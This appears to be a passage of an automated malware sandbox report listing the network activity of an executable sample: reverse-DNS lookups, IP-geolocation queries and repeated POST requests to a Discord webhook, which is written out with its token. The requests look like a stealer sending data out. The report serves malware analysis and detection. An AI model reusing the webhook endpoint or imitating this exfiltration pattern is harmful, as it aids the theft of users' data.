Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xRuZfaumJlt2wB3cMfc%2FDa26axrKvT2WJMElLw%2FKEtZOR9olQOfXz2JDU9PRk5FpCX5sBnlUhc%2FTKjO26wgiTziAs3VEFHQTeDyyWIX4iuG6RoWoje8vP3V0%2FiC5"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
X-Content-Type-Options: nosniff
Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
Set-Cookie: __sdcfduid=398bc26eed4011ee81f2da06b99260438f51fbb062bbdb713f960e0bf39472ffc69e9a28b0314b8a1566c703f0beba78; Expires=Tue, 27-Mar-2029 20:17:39 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
Set-Cookie: __cfruid=bec68b89d56816841f41de6decf9bec5b689d633-1711657059; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Set-Cookie: _cfuvid=VxN29yt3aKP_QcoFEMQbSj20vYAOaIvFRporr9CrRYs-1711657059467-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
CF-RAY: 86ba4e0cbca0654b-LHR
-
Remote address:8.8.8.8:53Request97.17.167.52.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request103.169.127.40.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request15.164.165.52.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request8.11.19.2.in-addr.arpaIN PTRResponse8.11.19.2.in-addr.arpaIN PTRa2-19-11-8deploystaticakamaitechnologiescom
-
Remote address:8.8.8.8:53Request11.227.111.52.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request27.73.42.20.in-addr.arpaIN PTRResponse
-
826 B 5.0kB 12 9
-
296 B 611 B 5 3
HTTP Request
GET http://ip-api.com//json/HTTP Response
200 -
162.159.138.232:443https://discord.com/api/webhooks/897139619336966215/JnDh4Q-lR3UDGzcnqgYR7VieyLoWfMVkVYrFGteFEdlA3kcMpCdb5ozh-U8qJs12EkbStls, http0f243aa3dcd8c33124e3fa9d3d12c343_JaffaCakes118.exe4.6kB 10.8kB 21 28
HTTP Request
POST https://discord.com/api/webhooks/897139619336966215/JnDh4Q-lR3UDGzcnqgYR7VieyLoWfMVkVYrFGteFEdlA3kcMpCdb5ozh-U8qJs12EkbSHTTP Response
404HTTP Request
POST https://discord.com/api/webhooks/897139619336966215/JnDh4Q-lR3UDGzcnqgYR7VieyLoWfMVkVYrFGteFEdlA3kcMpCdb5ozh-U8qJs12EkbSHTTP Response
404HTTP Request
POST https://discord.com/api/webhooks/897139619336966215/JnDh4Q-lR3UDGzcnqgYR7VieyLoWfMVkVYrFGteFEdlA3kcMpCdb5ozh-U8qJs12EkbSHTTP Response
404HTTP Request
POST https://discord.com/api/webhooks/897139619336966215/JnDh4Q-lR3UDGzcnqgYR7VieyLoWfMVkVYrFGteFEdlA3kcMpCdb5ozh-U8qJs12EkbSHTTP Response
404 -
162.159.138.232:443https://discord.com/api/webhooks/897139619336966215/JnDh4Q-lR3UDGzcnqgYR7VieyLoWfMVkVYrFGteFEdlA3kcMpCdb5ozh-U8qJs12EkbStls, http0f243aa3dcd8c33124e3fa9d3d12c343_JaffaCakes118.exe1.3kB 2.2kB 8 9
HTTP Request
POST https://discord.com/api/webhooks/897139619336966215/JnDh4Q-lR3UDGzcnqgYR7VieyLoWfMVkVYrFGteFEdlA3kcMpCdb5ozh-U8qJs12EkbSHTTP Response
404
-
73 B 147 B 1 1
DNS Request
217.106.137.52.in-addr.arpa
-
59 B 75 B 1 1
DNS Request
ip4.seeip.org
DNS Response
23.128.64.141
-
71 B 116 B 1 1
DNS Request
0.205.248.87.in-addr.arpa
-
71 B 157 B 1 1
DNS Request
2.159.190.20.in-addr.arpa
-
56 B 72 B 1 1
DNS Request
ip-api.com
DNS Response
208.95.112.1
-
57 B 137 B 1 1
DNS Request
discord.com
DNS Response
162.159.138.232162.159.137.232162.159.128.233162.159.136.232162.159.135.232
-
72 B 140 B 1 1
DNS Request
141.64.128.23.in-addr.arpa
-
71 B 95 B 1 1
DNS Request
1.112.95.208.in-addr.arpa
-
74 B 136 B 1 1
DNS Request
232.138.159.162.in-addr.arpa
-
71 B 145 B 1 1
DNS Request
97.17.167.52.in-addr.arpa
-
73 B 147 B 1 1
DNS Request
103.169.127.40.in-addr.arpa
-
72 B 146 B 1 1
DNS Request
15.164.165.52.in-addr.arpa
-
68 B 129 B 1 1
DNS Request
8.11.19.2.in-addr.arpa
-
72 B 158 B 1 1
DNS Request
11.227.111.52.in-addr.arpa
-
70 B 156 B 1 1
DNS Request
27.73.42.20.in-addr.arpa